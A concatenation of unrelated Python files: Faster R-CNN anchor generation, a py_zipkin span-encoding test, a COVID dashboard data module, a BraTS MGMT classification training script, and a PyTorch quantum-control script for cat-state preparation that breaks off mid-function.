            for layer in [self.rpn_conv_trans[0], self.rpn_conv_cls, self.rpn_conv_reg]:
                kaimingInit(layer, nonlinearity='relu')
        # xavier
        elif init_method == 'xavier':
            for layer in [self.rpn_conv_trans[0], self.rpn_conv_cls, self.rpn_conv_reg]:
                xavierInit(layer, distribution='uniform')
        # unsupport
        else:
            raise RuntimeError('Unsupport initWeights.init_method <%s>...' % init_method)
    '''
    Function:
        generate anchors.
    Input:
        --size_base(int): the base anchor size (16 in faster RCNN).
        --scales(list): scales for anchor boxes.
        --ratios(list): ratios for anchor boxes.
    Return:
        --anchors(torch.FloatTensor): [nA, 4], the format is (x1, y1, x2, y2).
    '''
    @staticmethod
    def generateAnchors(size_base=16, scales=2**np.arange(3, 6), ratios=[0.5, 1, 2]):
        # NOTE(review): the array/list defaults are evaluated once at import time
        # and shared across calls; they are only read here, so this is safe, but
        # they must never be mutated.
        def getWHCxCy(anchor):
            # width/height and center of an (x1, y1, x2, y2) anchor
            w = anchor[2] - anchor[0] + 1
            h = anchor[3] - anchor[1] + 1
            cx = anchor[0] + 0.5 * (w - 1)
            cy = anchor[1] + 0.5 * (h - 1)
            return w, h, cx, cy
        def makeAnchors(ws, hs, cx, cy):
            # build (x1, y1, x2, y2) anchors from widths/heights around a center
            ws = ws[:, np.newaxis]
            hs = hs[:, np.newaxis]
            anchors = np.hstack((cx - 0.5 * (ws - 1),
                                 cy - 0.5 * (hs - 1),
                                 cx + 0.5 * (ws - 1),
                                 cy + 0.5 * (hs - 1)))
            return anchors
        scales = np.array(scales)
        ratios = np.array(ratios)
        # start from the base box, vary the aspect ratio while keeping the area,
        # then scale each ratio variant by every scale
        anchor_base = np.array([1, 1, size_base, size_base]) - 1
        w, h, cx, cy = getWHCxCy(anchor_base)
        size = w * h
        size_ratios = size / ratios
        ws = np.round(np.sqrt(size_ratios))
        hs = np.round(ws * ratios)
        anchors = makeAnchors(ws, hs, cx, cy)
        tmp = list()
        for i in range(anchors.shape[0]):
            w, h, cx, cy = getWHCxCy(anchors[i, :])
            ws = w * scales
            hs = h * scales
            tmp.append(makeAnchors(ws, hs, cx, cy))
        anchors = np.vstack(tmp)
        return torch.from_numpy(anchors).float()
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from collections import OrderedDict
import mock
import pytest
from thriftpy2.protocol.binary import read_list_begin
from thriftpy2.protocol.binary import TBinaryProtocol
from thriftpy2.transport import TMemoryBuffer
from py_zipkin import Encoding
from py_zipkin import Kind
from py_zipkin import thrift
from py_zipkin import zipkin
from py_zipkin.thrift import zipkin_core
from py_zipkin.util import generate_random_64bit_string
from py_zipkin.zipkin import ZipkinAttrs
from tests.test_helpers import MockTransportHandler
def _decode_binary_thrift_objs(obj):
    """Deserialize a binary-thrift payload into a list of zipkin_core.Span objects."""
    buffer = TMemoryBuffer(obj)
    _, span_count = read_list_begin(buffer)
    decoded = []
    for _ in range(span_count):
        current = zipkin_core.Span()
        current.read(TBinaryProtocol(buffer))
        decoded.append(current)
    return decoded
def us(seconds):
    """Convert a duration in seconds to integer microseconds."""
    microseconds_per_second = 1000 * 1000
    return int(seconds * microseconds_per_second)
def check_v1_json(obj, zipkin_attrs, inner_span_id, ts):
    """Assert that a V1 JSON payload contains the expected inner, producer
    and root spans (serialized in that order) for the test_encoding scenario."""
    inner_span, producer_span, root_span = json.loads(obj)
    endpoint = {
        "ipv4": "10.0.0.0",
        "port": 8080,
        "serviceName": "test_service_name",
    }
    remote_endpoint = {
        "ipv6": "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
        "port": 8888,
        "serviceName": "sa_service",
    }
    expected_root = {
        "traceId": zipkin_attrs.trace_id,
        "parentId": zipkin_attrs.parent_span_id,
        "name": "test_span_name",
        "id": zipkin_attrs.span_id,
        "binaryAnnotations": [
            {"endpoint": endpoint, "key": "some_key", "value": "some_value"},
            {"endpoint": remote_endpoint, "key": "sa", "value": True},
        ],
        "annotations": [
            {"endpoint": endpoint, "timestamp": us(ts), "value": "cs"},
            {"endpoint": endpoint, "timestamp": us(ts + 10), "value": "cr"},
        ],
    }
    expected_inner = {
        "traceId": zipkin_attrs.trace_id,
        "parentId": zipkin_attrs.span_id,
        "name": "inner_span",
        "id": inner_span_id,
        "timestamp": us(ts),
        "duration": us(5),
        "binaryAnnotations": [],
        "annotations": [{"endpoint": endpoint, "timestamp": us(ts), "value": "ws"}],
    }
    expected_producer = {
        "traceId": zipkin_attrs.trace_id,
        "parentId": zipkin_attrs.span_id,
        "name": "producer_span",
        "id": inner_span_id,
        "timestamp": us(ts),
        "duration": us(10),
        "binaryAnnotations": [],
        "annotations": [{"endpoint": endpoint, "timestamp": us(ts), "value": "ms"}],
    }
    assert root_span == expected_root
    assert inner_span == expected_inner
    assert producer_span == expected_producer
def check_v1_thrift(obj, zipkin_attrs, inner_span_id, ts):
    """Assert that a V1 binary-thrift payload contains the expected inner,
    producer and root spans (serialized in that order)."""
    inner_span, producer_span, root_span = _decode_binary_thrift_objs(obj)
    endpoint = thrift.create_endpoint(
        port=8080, service_name="test_service_name", ipv4="10.0.0.0",
    )

    def compare(actual, expected):
        # py.test diffs of thrift Spans are pretty useless and hide many things.
        # These prints only show up on stdout when the assert fails and make it
        # possible to compare the two spans by eye.
        print(actual)
        print(expected)
        assert actual == expected

    binary_annotations = thrift.binary_annotation_list_builder(
        {"some_key": "some_value"}, endpoint,
    )
    sa_endpoint = thrift.create_endpoint(
        port=8888,
        service_name="sa_service",
        ipv6="2001:0db8:85a3:0000:0000:8a2e:0370:7334",
    )
    binary_annotations.append(
        thrift.create_binary_annotation(
            "sa", "\x01", zipkin_core.AnnotationType.BOOL, sa_endpoint,
        )
    )
    compare(
        root_span,
        thrift.create_span(
            span_id=zipkin_attrs.span_id,
            parent_span_id=zipkin_attrs.parent_span_id,
            trace_id=zipkin_attrs.trace_id,
            span_name="test_span_name",
            annotations=thrift.annotation_list_builder(
                OrderedDict([("cs", ts), ("cr", ts + 10)]), endpoint,
            ),
            binary_annotations=binary_annotations,
            timestamp_s=None,
            duration_s=None,
        ),
    )
    compare(
        inner_span,
        thrift.create_span(
            span_id=inner_span_id,
            parent_span_id=zipkin_attrs.span_id,
            trace_id=zipkin_attrs.trace_id,
            span_name="inner_span",
            annotations=thrift.annotation_list_builder(
                OrderedDict([("ws", ts)]), endpoint,
            ),
            binary_annotations=[],
            timestamp_s=ts,
            duration_s=5,
        ),
    )
    compare(
        producer_span,
        thrift.create_span(
            span_id=inner_span_id,
            parent_span_id=zipkin_attrs.span_id,
            trace_id=zipkin_attrs.trace_id,
            span_name="producer_span",
            annotations=thrift.annotation_list_builder(
                OrderedDict([("ms", ts)]), endpoint,
            ),
            binary_annotations=[],
            timestamp_s=ts,
            duration_s=10,
        ),
    )
def check_v2_json(obj, zipkin_attrs, inner_span_id, ts):
    """Assert that a V2 JSON payload contains the expected inner, producer
    and root spans (serialized in that order) for the test_encoding scenario."""
    inner_span, producer_span, root_span = json.loads(obj)
    local_endpoint = {
        "ipv4": "10.0.0.0",
        "port": 8080,
        "serviceName": "test_service_name",
    }
    expected_root = {
        "traceId": zipkin_attrs.trace_id,
        "name": "test_span_name",
        "parentId": zipkin_attrs.parent_span_id,
        "id": zipkin_attrs.span_id,
        "kind": "CLIENT",
        "timestamp": us(ts),
        "duration": us(10),
        "shared": True,
        "localEndpoint": local_endpoint,
        "remoteEndpoint": {
            "ipv6": "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
            "port": 8888,
            "serviceName": "sa_service",
        },
        "tags": {"some_key": "some_value"},
    }
    expected_inner = {
        "traceId": zipkin_attrs.trace_id,
        "name": "inner_span",
        "parentId": zipkin_attrs.span_id,
        "id": inner_span_id,
        "timestamp": us(ts),
        "duration": us(5),
        "localEndpoint": local_endpoint,
        "annotations": [{"timestamp": us(ts), "value": "ws"}],
    }
    expected_producer = {
        "traceId": zipkin_attrs.trace_id,
        "name": "producer_span",
        "parentId": zipkin_attrs.span_id,
        "id": inner_span_id,
        "kind": "PRODUCER",
        "timestamp": us(ts),
        "duration": us(10),
        "localEndpoint": local_endpoint,
    }
    assert root_span == expected_root
    assert inner_span == expected_inner
    assert producer_span == expected_producer
@pytest.mark.parametrize(
    "encoding,validate_fn",
    [
        (Encoding.V1_THRIFT, check_v1_thrift),
        (Encoding.V1_JSON, check_v1_json),
        (Encoding.V2_JSON, check_v2_json),
    ],
)
def test_encoding(encoding, validate_fn):
    """End-to-end test: emit a root span with a nested inner span and a
    producer span through a mocked transport, then validate the encoded
    payload with the encoding-specific checker."""
    zipkin_attrs = ZipkinAttrs(
        trace_id=generate_random_64bit_string(),
        span_id=generate_random_64bit_string(),
        parent_span_id=generate_random_64bit_string(),
        is_sampled=True,
        flags=None,
    )
    inner_span_id = generate_random_64bit_string()
    mock_transport_handler = MockTransportHandler(10000)
    # Let's hardcode the timestamp rather than call time.time() every time.
    # The issue with time.time() is that the convertion to int of the
    # returned float value * 1000000 is not precise and in the same test
    # sometimes returns N and sometimes N+1. This ts value doesn't have that
    # issue afaict, probably since it ends in zeros.
    ts = 1538544126.115900
    with mock.patch("time.time", autospec=True) as mock_time:
        # zipkin.py start, logging_helper.start, 3 x logging_helper.stop
        # I don't understand why logging_helper.stop would run 3 times, but
        # that's what I'm seeing in the test
        mock_time.side_effect = iter(
            [ts, ts, ts + 10, ts + 10, ts + 10, ts + 10, ts + 10]
        )
        with zipkin.zipkin_span(
            service_name="test_service_name",
            span_name="test_span_name",
            transport_handler=mock_transport_handler,
            binary_annotations={"some_key": "some_value"},
            encoding=encoding,
            zipkin_attrs=zipkin_attrs,
            host="10.0.0.0",
            port=8080,
            kind=Kind.CLIENT,
        ) as span:
            # pin the generated span id so the inner/producer spans are predictable
            with mock.patch.object(
                zipkin, "generate_random_64bit_string", return_value=inner_span_id,
            ):
                with zipkin.zipkin_span(
                    service_name="test_service_name",
                    span_name="inner_span",
                    timestamp=ts,
                    duration=5,
                    annotations={"ws": ts},
                ):
                    span.add_sa_binary_annotation(
                        8888, "sa_service", "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
                    )
                with zipkin.zipkin_span(
                    service_name="test_service_name",
                    span_name="producer_span",
                    timestamp=ts,
                    duration=10,
                    kind=Kind.PRODUCER,
                ):
                    pass
    # the whole trace is flushed as a single payload when the root span closes
    output = mock_transport_handler.get_payloads()[0]
    validate_fn(output, zipkin_attrs, inner_span_id, ts)
|
<reponame>mattttime/ECM1400-Covid-Dashboard
'''this module handles all the data in csv/json files containing the covid information to be shown on the dashboard'''
import logging
#aquires modules for scheduling events
import sched
import time
#aquires modules for accessing APIs and processing their data
import requests
import json
from uk_covid19 import Cov19API
def parse_csv_data(csv_filename):
    '''Open the given CSV file and return its contents as a list of lines.

    Arguments:
        csv_filename -- path of the CSV file to read.
    Returns:
        list of str -- one entry per line of the file (newlines preserved).
    '''
    logging.info("Function parse_csv_data initiated with arguments csv_filename= %s", csv_filename)
    # 'with' guarantees the handle is closed even if reading fails; the
    # original opened the file, never closed it, and printed the handle.
    with open(csv_filename, "r") as file_data:
        return file_data.readlines()
def process_covid_csv_data(covid_csv_data):
    '''Extract headline statistics from parsed covid CSV data.

    Arguments:
        covid_csv_data -- list of CSV lines as returned by parse_csv_data.
    Returns:
        tuple (cases_weekly_total, current_hospital_cases, total_deaths),
        all three as ints.
    '''
    # Lazy %s formatting instead of '+' concatenation: the original added a
    # list onto a str, which raised TypeError before any processing happened.
    logging.info("Function process_covid_csv_data initiated with arguments covid_csv_data= %s", covid_csv_data)
    # Total deaths: row 14 is the first row with a value in column 4.
    total_deaths = covid_csv_data[14].split(",")[4]
    # Weekly cases: sum 7 days of data from column 6. The first two data rows
    # (indices 1-2) are incomplete and therefore skipped, so rows 3-9 are used.
    cases_weekly_total = 0
    for row_index in range(3, 10):
        daily_cases = covid_csv_data[row_index].split(",")[6]
        cases_weekly_total += int(daily_cases)
    # Current hospital cases: row 1, column 5.
    current_hospital_cases = covid_csv_data[1].split(",")[5]
    return cases_weekly_total, int(current_hospital_cases), int(total_deaths)
def covid_API_request(location="Exeter", location_type="ltla"):
    '''Query the Public Health England covid-19 API for local and national data.

    Arguments:
        location -- area name for the local query (default "Exeter").
        location_type -- area type for the local query (default "ltla").
    Returns:
        tuple (api_data_local, api_data_national), or (None, None) when the
        data could not be retrieved.
    '''
    logging.info("Function covid_API_request initiated with variables location=%s, location type=%s", location, location_type)
    # fields to request from the API, mapped to friendlier names
    cases_and_deaths = {
        "date": "date",
        "daily_cases": "newCasesByPublishDate",
        "total_cases": "cumCasesByPublishDate",
        "hospital_cases": "hospitalCases",
        "total_deaths": "cumDeaths28DaysByDeathDate"
    }
    # filters used for retrieving local case data
    filter_methods_local = {
        'areaType=' + location_type,
        'areaName=' + location
    }
    # filter used for retrieving national case/death/hospital data
    filter_methods_national = {
        'areaType=nation',
        'areaName=England'
    }
    try:
        api_call_local = Cov19API(filters=filter_methods_local, structure=cases_and_deaths)
        api_call_national = Cov19API(filters=filter_methods_national, structure=cases_and_deaths)
        # gets the needed data from the most recent phe update
        api_data_local = api_call_local.get_json()
        api_data_national = api_call_national.get_json()
        if api_data_local is None or api_data_national is None:
            raise ValueError("one or more API calls is empty")
    except ValueError:
        logging.error("An API request has failed, retrying with default values")
        # Don't retry when we already used the defaults, otherwise this would
        # recurse forever while the API itself is down.
        if location == "Exeter" and location_type == "ltla":
            return None, None
        # Return the retry's result; the original discarded it and fell
        # through to return the empty data it had just rejected.
        return covid_API_request()
    except Exception:
        # narrowed from a bare 'except' so SystemExit/KeyboardInterrupt propagate;
        # logging.exception also records the traceback for debugging
        logging.exception("An unknown error has occured")
        return None, None
    logging.info("covid API request successful")
    return api_data_local, api_data_national
def process_covid_json_data(covid_json_data):
    '''Process API json data, mirroring process_covid_csv_data.

    Arguments:
        covid_json_data -- dict as returned by Cov19API.get_json(), with a
        "data" list of per-day entries, most recent first.
    Returns:
        tuple (sum_cases, hospital_cases, total_deaths), or
        (None, None, None) when the input is missing or malformed.
    '''
    sum_cases = 0
    try:
        data_list = covid_json_data["data"]
        # Sum the last 7 complete days of cases; entry 0 is the most recent
        # (still incomplete) day, so start at index 1. The original looped
        # range(1, 7) and only summed 6 days despite documenting 7.
        for entry_index in range(1, 8):
            sum_cases += data_list[entry_index]["daily_cases"]
        # the newest complete entries for deaths (index 1) and hospital cases (index 2)
        total_deaths = data_list[1]["total_deaths"]
        hospital_cases = data_list[2]["hospital_cases"]
    except TypeError:
        # e.g. covid_json_data is None or a field is missing/None
        return None, None, None
    return sum_cases, hospital_cases, total_deaths
# NOTE(review): this runs at import time and performs network API calls as a
# side effect of importing the module — consider moving it behind a
# `if __name__ == "__main__":` guard.
local_data,national_data=covid_API_request()
|
<reponame>innat/BraTS-MGMT-Classification
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedKFold
import tensorflow as tf
import config
# For reproducible results
# For reproducible results
config.seed_all(config.global_seed)
config.accelerate_gpu(config.mixed_precision)
# these are corrupted id, so here we are just removing them
train_df_path, trian_img_path, registered_samples = config.sample_path(registered_samples = False)
df = pd.read_csv(train_df_path)
# BraTS21IDs 109, 123 and 709 are the known-corrupted samples being dropped
df = df[~df.BraTS21ID.isin([109, 709, 123])]
df = df.reset_index(drop=True)
# stratified K-fold on the MGMT label; each row's fold index is stored in a 'fold' column
skf = StratifiedKFold(n_splits=config.num_of_fold,
                      shuffle=True,
                      random_state=config.global_seed)
for index, (train_index, val_index) in enumerate(skf.split(X=df.index, y=df.MGMT_value)):
    df.loc[val_index, 'fold'] = index
# sanity check: print the class balance per fold
print(df.groupby(['fold', df.MGMT_value]).size())
from dataloader._3d.sample_loader import BrainTSGeneratorRegistered, BrainTSGeneratorRaw
def fold_generator(fold):
    """Return (train_generator, val_generator) for the given fold index.

    Rows whose ``fold`` column differs from *fold* form the training split,
    the remaining rows the validation split.  The generator class depends on
    whether the registered (pre-aligned) samples are in use.
    """
    train_labels = df[df.fold != fold].reset_index(drop=True)
    val_labels = df[df.fold == fold].reset_index(drop=True)
    generator_cls = (BrainTSGeneratorRegistered if registered_samples
                     else BrainTSGeneratorRaw)
    return (generator_cls(trian_img_path, train_labels),
            generator_cls(trian_img_path, val_labels))
# Get fold set
train_gen, val_gen = fold_generator(config.fold)
# Sanity-check one raw sample from the training generator.
for x, y in train_gen:
    print(x.shape, y.shape)
    break
# Wrap the Python generators as tf.data pipelines with explicit shapes.
train_data = tf.data.Dataset.from_generator(
    lambda: map(tuple, train_gen),
    (tf.float32, tf.float32),
    (
        tf.TensorShape([config.input_height, config.input_width, config.input_depth,
                        config.input_channel]),
        tf.TensorShape([]),
    ),
)
val_data = tf.data.Dataset.from_generator(
    lambda: map(tuple, val_gen),
    (tf.float32, tf.float32),
    (
        tf.TensorShape([config.input_height, config.input_width, config.input_depth,
                        config.input_channel]),
        tf.TensorShape([]),
    ),
)
from augment._3d.keras_augmentation import *
from augment._3d.tf_augmentation import *
from augment._3d.volumentation import *
# Select the augmentation backend declared in config.
if config.aug_lib == 'keras':
    augmentor = keras_augment
elif config.aug_lib == 'tf':
    augmentor = tf_image_augmentation
elif config.aug_lib == 'volumentations':
    augmentor = volumentations_aug
else:
    augmentor = None
from dataloader._3d.tf_generator import TFDataGenerator
# NOTE(review): the bare names modeling_in / aug_lib / batch_size were
# undefined at module scope (NameError at runtime); they are read from
# config here, matching the rest of this script.
tf_gen = TFDataGenerator(train_data,
                         modeling_in=config.modeling_in,
                         shuffle=True,
                         aug_lib=config.aug_lib,
                         augmentor=augmentor,
                         batch_size=config.batch_size,
                         rescale=False)
train_generator = tf_gen.get_3D_data()
x, y = next(iter(train_generator))
print(x.shape, y.shape, x.numpy().max(), y.numpy().min())
# Visualize a few augmented batches.  Distinct loop variables are used so
# the batch index is not clobbered by the slice index (the original reused
# `i` for both loops).
for batch_idx, (x, y) in enumerate(train_generator.take(3)):
    if config.modeling_in == '3D':
        for j in range(config.input_channel):
            plt.figure(figsize=(30, 20))
            for d in range(config.input_depth):
                plt.subplot(8, 8, d + 1)
                plt.imshow(x[0, :, :, d, j], cmap='gray')
                plt.axis("off")
                plt.title(y[0].numpy())
            plt.show()
            print('\n'*3)
    elif config.modeling_in == '2D':
        plt.figure(figsize=(30, 20))
        for d in range(config.input_depth*config.input_channel):
            plt.subplot(5, 8, d + 1)
            plt.imshow(x[0, :, :, d], cmap='gray')
            plt.axis("off")
            plt.title(y[0].numpy())
# Validation pipeline: no shuffling and no augmentation.
# NOTE(review): modeling_in / batch_size and the input_* names were
# undefined bare names (NameError at runtime); read them from config,
# matching the rest of this script.
tf_gen = TFDataGenerator(val_data,
                         modeling_in=config.modeling_in,
                         shuffle=False,
                         aug_lib=None,
                         augmentor=None,
                         batch_size=config.batch_size,
                         rescale=False
                         )
valid_generator = tf_gen.get_3D_data()
from model._3d.classifier import get_model
tf.keras.backend.clear_session()
model = get_model(config.input_width, config.input_height,
                  config.input_depth, config.input_channel)
model.summary()
model.compile(
    loss=tf.keras.losses.BinaryCrossentropy(from_logits=False),
    optimizer='adam',
    metrics=[tf.keras.metrics.AUC(),
             tf.keras.metrics.BinaryAccuracy(name='acc')],
)
# Keep only the checkpoint with the best validation AUC.
checkpoint_cb = tf.keras.callbacks.ModelCheckpoint(
    filepath="model.{epoch:02d}-{val_auc:.4f}.h5",
    monitor='val_auc', mode='max',
    save_best_only=True, verbose=1
)
epochs = 2
model.fit(
    train_generator,
    epochs=epochs,
    validation_data=valid_generator,
    callbacks=[checkpoint_cb], verbose=1
)
"""
Differentiable Programming Quantum Control
Example: Preparation of cat states in a quantum parametric oscillator
"""
import os, sys
sys.path.append('..')
# import common parameters
import parameters_para
import numpy as np
import qutip as qu
import argparse
import pickle # to store and visualize output
import time
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import cm
import torch
from torch import optim
import torch.nn as nn
import torch.nn.functional as F
#muting matplotlib comments
#import logging
#logging.getLogger("imported_module").setLevel(logging.WARNING)
# reproducibility is good: seed numpy and torch (and CUDA if present)
seed=200
np.random.seed(seed)
torch.manual_seed(seed)
rng = np.random.RandomState(seed)
if torch.cuda.is_available():
    torch.cuda.manual_seed_all(seed)
    # Deterministic cuDNN kernels trade some speed for reproducibility.
    torch.backends.cudnn.deterministic = True
# Run on the first GPU when available, otherwise on the CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# device = torch.device("cpu")
class Timer(object):
    """Context manager that prints the elapsed wall-clock time of its block.

    An optional *name* label is printed before the elapsed time.
    """

    def __init__(self, name=None):
        # Label printed before the elapsed time (suppressed when falsy).
        self.name = name

    def __enter__(self):
        # Record the wall-clock start time.
        self.tstart = time.time()

    def __exit__(self, type, value, traceback):
        elapsed = time.time() - self.tstart
        if self.name:
            print('[%s]' % self.name,)
        print('Elapsed: %s' % elapsed)
class PredCorrNetwork(nn.Module):
    """Differentiable controller for cat-state preparation.

    Maps the current state vector (real/imaginary parts) and the previous
    control amplitude to the next control amplitude, then unrolls the
    Heun-integrated dynamics for ``n_steps`` control steps so the whole
    trajectory loss is differentiable end to end.
    """
    def __init__(self, dim, n_par, target_state, pretrained=False):
        """Build the network and precompute the Hamiltonian matrices.

        Args:
            dim: Fock-space truncation dimension of the oscillator.
            n_par: number of trajectories evolved in parallel (batch size).
            target_state: qutip state vector to prepare.
            pretrained: load weights from ../data/para_model.pth when True.
        """
        super().__init__()
        self.dim = dim
        self.n_par = n_par
        # parameters (episode length, integrator substeps, time step, ...)
        self.n_steps = parameters_para.max_episode_steps
        self.n_substeps = parameters_para.n_substeps
        self.dt = parameters_para.dt
        self.gamma = parameters_para.gamma
        self.force_mag = parameters_para.force_mag
        print("n_steps = {}, n_substeps = {}, d_t = {}".format(self.n_steps, self.n_substeps, self.dt))
        # loss hyperparameters (relative weights of the loss terms below)
        self.C1 = 0.8 # evolution state fidelity
        self.C2 = 0.01 # action amplitudes
        self.C3 = 1*self.n_substeps # final state fidelity
        self.C4 = 0.0 # steep grad punishment
        # target states, split into real/imaginary parts for real-valued math
        self.target_x = torch.as_tensor(np.real(target_state), dtype=torch.float, device=device).view(1,1,dim)
        self.target_y = torch.as_tensor(np.imag(target_state), dtype=torch.float, device=device).view(1,1,dim)
        # Hamiltonians: H_0 is the Kerr + pump drift, H_1 the control coupling
        a = qu.destroy(self.dim)
        H_0 = parameters_para.Kerr*(a.dag()**2)*a**2 - parameters_para.pump*(a**2+a.dag()**2)
        H_1 = (a+a.dag())
        # H_2 = (a.dag()*a)
        # Pre-multiply by dt so the integrator works with H*dt directly.
        self.H_0_dt = np.real(H_0.full())*self.dt
        self.H_0_dt = torch.as_tensor(self.H_0_dt, dtype=torch.float, device=device)
        self.H_1_dt = np.real(H_1.full())*self.dt
        self.H_1_dt = torch.as_tensor(self.H_1_dt, dtype=torch.float, device=device)
        # self.H_2_dt = np.real(H_2.full())*self.dt
        # self.H_2_dt = torch.as_tensor(self.H_2_dt, dtype=torch.float, device=device)
        # Diagonal of the number operator, used for <n> via einsum in forward().
        self.n_operator = torch.arange(self.dim, dtype=torch.float, device=device)
        # the network: three sub-nets whose outputs are combined below
        layers_state = [
            nn.Linear(2*dim, 512),
            nn.Linear(512, 256),
            nn.Linear(256, 256),
            nn.Linear(256, 64),
        ]
        layers_action = [
            nn.Linear(1, 128),
            nn.Linear(128, 64)
        ]
        layers_combine =[
            nn.Linear(64, 64),
            nn.Linear(64, 32),
            nn.Linear(32, 1, bias=True)
        ]
        # Activation functions
        # Define activation functions
        self.relu = nn.ReLU()
        self.sigmoid = nn.Sigmoid()
        self.tanh = nn.Tanh()
        self.elu = nn.ELU()
        self.actfunc = self.relu
        # Interleave every linear layer with the chosen activation.
        self.net_state = []
        for layer in layers_state:
            self.net_state.extend([layer, self.actfunc])
        #self.net_state.pop()
        self.net_state = nn.Sequential(*self.net_state).to(device)
        self.net_action = []
        for layer in layers_action:
            self.net_action.extend([layer, self.actfunc])
        #self.net_action.pop()
        self.net_action = nn.Sequential(*self.net_action).to(device)
        self.net_combine = []
        for layer in layers_combine:
            # add maybe activation function here
            self.net_combine.extend([layer, self.actfunc])
        # Drop the trailing activation so the control output is unbounded
        # (it is clamped in forward() instead).
        self.net_combine.pop()
        self.net_combine = nn.Sequential(*self.net_combine).to(device)
        if pretrained:
            #https://pytorch.org/tutorials/beginner/saving_loading_models.html
            #https://pytorch.org/docs/master/notes/serialization.html
            # NOTE(review): the checkpoint saved at the bottom of this file
            # stores 'model_state_dict' for the whole model, not the
            # 'model_action_dict' key read here — confirm checkpoint format.
            checkpoint = torch.load('../data/para_model.pth')
            self.net_state.load_state_dict(checkpoint['model_state_dict'])
            self.net_action.load_state_dict(checkpoint['model_action_dict'])
            self.net_state.train()
            self.net_action.train()
            print("---")
            print("Pretrained network is used!")
            print("---")
    def number_of_parameters(self):
        """Return the number of trainable parameters."""
        return(sum(p.numel() for p in self.parameters() if p.requires_grad))
    def Heun(self,x,y,H_dt):
        """One Heun (predictor-corrector) step of the coupled linear system
        x' = H_dt @ y, y' = -H_dt @ x (real/imaginary parts of the state)."""
        f_x, f_y = torch.matmul(H_dt,y), - torch.matmul(H_dt,x)
        # Predictor (Euler) step ...
        x_tilde, y_tilde = x + f_x, y + f_y
        # ... then corrector: average of slopes at the start and predicted end.
        x, y = x + 0.5* (torch.matmul(H_dt,y_tilde) + f_x) , y + 0.5* (-torch.matmul(H_dt,x_tilde) + f_y)
        return x, y
    def forward(self, psi_x, psi_y):
        """Unroll the controlled dynamics for n_steps control intervals.

        Args:
            psi_x, psi_y: real/imaginary parts of the batch of initial
                states, shape (n_par, dim).

        Returns:
            Final psi_x, psi_y, scalar loss, and per-step stores of
            fidelity, mean photon number and control amplitude.
        """
        # reshape to broadcast in matmul
        x, y = psi_x.view(self.n_par, self.dim, 1), psi_y.view(self.n_par, self.dim, 1)
        alpha = torch.zeros(self.n_par,1 , 1, device=device)
        loss = torch.zeros(self.n_par, device=device)
        fidelity_store = torch.zeros(self.n_steps, self.n_par, device=device)
        last_action_store = torch.zeros(1, self.n_steps, self.n_par, device=device)
        n_store = torch.zeros(self.n_steps, self.n_par, device=device)
        for j in range(self.n_steps):
            # Network input: concatenated real/imag state, shape (n_par, 1, 2*dim).
            input = torch.cat((x, y), 1).transpose(1,2)
            dalpha1 = self.net_state(input)
            dalpha2 = self.net_action(alpha) #+ alpha/self.force_mag
            alpha = self.net_combine(dalpha1 + dalpha2)
            # Saturate the control at the maximum allowed drive amplitude.
            alpha = torch.clamp(alpha, min=-self.force_mag, max=self.force_mag)
            alpha1 = alpha[:,:, 0].unsqueeze(-1)
            # alpha2 = alpha[:,:, 1].unsqueeze(-1)
            # Integrate the dynamics with the control held constant.
            for _ in range(self.n_substeps):
                H = self.H_0_dt+alpha1*self.H_1_dt#+alpha2*self.H_2_dt# has dimensions (n_par, dim, dim)
                x, y = self.Heun(x, y, H)
            # |<target|psi>|^2 expanded in real/imaginary components.
            fidelity = torch.matmul(self.target_x,x)**2 + torch.matmul(self.target_y,y)**2 + torch.matmul(self.target_y,x)**2+ torch.matmul(self.target_x,y)**2+2*torch.matmul(self.target_x,x)*torch.matmul(self.target_y,y)-2*torch.matmul(self.target_x,y)*torch.matmul(self.target_y,x)
            # Mean photon number <n> = sum_k k*|psi_k|^2 per trajectory.
            mean_n = torch.einsum("b, abc->a", self.n_operator, x**2+y**2)
            alpha1 = alpha1.squeeze()
            # alpha2 = alpha2.squeeze()
            loss += self.C1*self.gamma**j*(1-fidelity[:,0,0]) # add state infidelity Loss
            abs_alpha = abs(alpha1)# + abs(alpha2)
            loss += self.gamma**j*self.C2*abs_alpha
            #punish large gradients (difference to the previous control value)
            gradients=abs(alpha1-last_action_store[0, j-1])#+abs(alpha2-last_action_store[1, j-1])
            loss += self.C4*gradients
            # feed storage
            fidelity_store[j] = fidelity[:,0,0]
            last_action_store[0, j] = alpha1
            # last_action_store[1, j] = alpha2
            n_store[j]=mean_n
        psi_x, psi_y = x.view(self.n_par, self.dim), y.view(self.n_par, self.dim)
        # Extra weight on the final-state fidelity.
        loss += self.C3*(1-fidelity_store[-1])
        loss = loss.mean()#/self.n_steps
        return psi_x, psi_y, loss, fidelity_store, n_store, last_action_store
def render(axes, state, fidelities_mean, fidelities_std, last_actions_mean, n_store_mean, n_store_std):
    """Redraw the five diagnostic panels for one trajectory.

    Panels: Fock amplitude distribution |C|^2, Wigner function, control
    amplitude u_x over time, fidelity over time, and mean photon number <n>.
    *state* is a (psi_x, psi_y) pair of numpy arrays of length ``dim``.
    """
    global dim
    trange = np.arange(parameters_para.max_episode_steps)
    x, y = state
    # clear axis of plot
    axes[0].cla()
    axes[1].cla()
    axes[2].cla()
    axes[3].cla()
    axes[4].cla()
    # plot the Fock distribution (maybe add -0.5 as in the qutip tutorial)
    plt1 = axes[0].bar(np.arange(0, dim), x**2+y**2, color='orange')
    axes[0].set_xlim([0-0.5, dim-0.5])
    axes[0].set_ylim([0, 1.0])
    # plot the Wigner function graph
    xvec = np.linspace(-6, 6, 20)
    # Rebuild the complex state from its real/imaginary parts for qutip.
    psi_f=qu.Qobj(x[:] + 1j* y[:])
    W = qu.wigner(psi_f, xvec, xvec)
    wmap = qu.wigner_cmap(W) # Generate Wigner colormap
    # Symmetric color scale around zero so negativity is visible.
    wlim = abs(W).max()
    cmap = cm.get_cmap('RdBu')
    plt2 = axes[1].contourf(xvec, xvec, W, 20, norm=mpl.colors.Normalize(-wlim, wlim), cmap=cmap)
    plt3 = axes[2].plot(trange, last_actions_mean[0], color='blue', label='x controls')
    # plt3 = axes[2].plot(trange, last_actions_mean[1], color='red', label='y controls')
